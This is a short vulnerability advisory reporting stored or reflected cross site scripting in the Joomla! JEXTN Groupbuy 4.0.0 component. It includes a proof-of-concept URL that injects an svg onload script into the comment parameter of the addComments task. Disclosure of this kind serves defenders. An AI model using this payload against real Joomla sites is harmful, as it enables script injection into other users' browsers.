Joomla! JEXTN Groupbuy 4.0.0 Cross Site Scripting

Joomla! JEXTN Groupbuy component version 4.0.0 suffers from a cross site scripting vulnerability.


MD5 | 6f4616b74621814d939e232a5a2a965c

################################################
#Title: Joomla! JEXTN Groupbuy 4.0.0 - XSS
#Credit: Bilal KARDADOU
#Vendor: http://www.jextn.com
#URL:
https://extensions.joomla.org/extensions/extension/social-web/social-buy/jextn-groupbuy/
#Product: 'Joomla! JEXTN Groupbuy 4.0.0'
#Developer: jextn.com
#Last updated: Jan 04 2016
#Compatibility: 3.X
#Type: Paid download
################################################
#
# GET -p
#
http://127.0.0.1/joomla/index.php?option=com_jegroupbuy&view=jegroupbuy&task=addComments&comment=hello11%3Csvg/onload=prompt(123);%3E&pid=4&tmpl=component
# PoC:
# https://prnt.sc/hul4p1
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Related Posts